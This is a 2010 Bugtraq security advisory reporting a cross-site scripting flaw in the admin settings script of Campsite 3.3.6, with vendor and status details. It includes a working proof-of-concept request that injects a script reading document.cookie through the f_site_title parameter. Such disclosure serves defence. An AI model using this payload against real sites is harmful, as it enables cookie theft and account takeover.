[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    XSS vulnerability in Campsite
From:       advisory () htbridge ! ch
Date:       2010-07-30 14:23:30
Message-ID: 201007301423.o6UENU2T028887 () htbridge ! ch
[Download RAW message or body]

Vulnerability ID: HTB22495
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_campsite_1.html
Product: Campsite
Vendor: Sourcefabric o.p.s ( http://www.sourcefabric.org/ ) 
Vulnerable Version: 3.3.6 and Probably Prior Versions
Vendor Notification: 16 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing \
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/admin/system_pref/do_edit.php" \
script to properly sanitize user-supplied input in "f_site_title" variable. \
Successful exploitation of this vulnerability could result in a compromise of the \
application, theft of cookie-based authentication credentials, disclosure or \
modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is \
available: http://host/admin/system_pref/do_edit.php?f_campsite_online=Y&f_site_title= \
Kora"><script>alert(document.cookie)</script>&f_site_metakeywords=11&f_site_metadescri \
ption=22&f_cache_enabled=N&f_cache_engine=APC&f_imagecache_lifetime=86400&f_secret_key \
=1&f_session_lifetime=1400&f_keyword_separator=%2C&f_login_num=3&f_max_upload_filesize \
=16M&f_smtp_host=localhost&f_smtp_port=25&f_editor_image_ratio=100&f_external_subs_man \
agement=N&f_use_replication=N&f_db_repl_host=&f_db_repl_user=&f_db_repl_pass=&f_db_rep \
l_port=3306&f_use_campcaster=N&f_cc_hostname=localhost&f_cc_hostport=80&f_cc_xrpcpath= \
%2Fcampcaster%2FstorageServer%2Fvar%2Fxmlrpc%2F&f_cc_xrpcfile=xrLocStor.php&f_template_filter=.*%2C+CVS&save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C \
HTTP/1.1


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic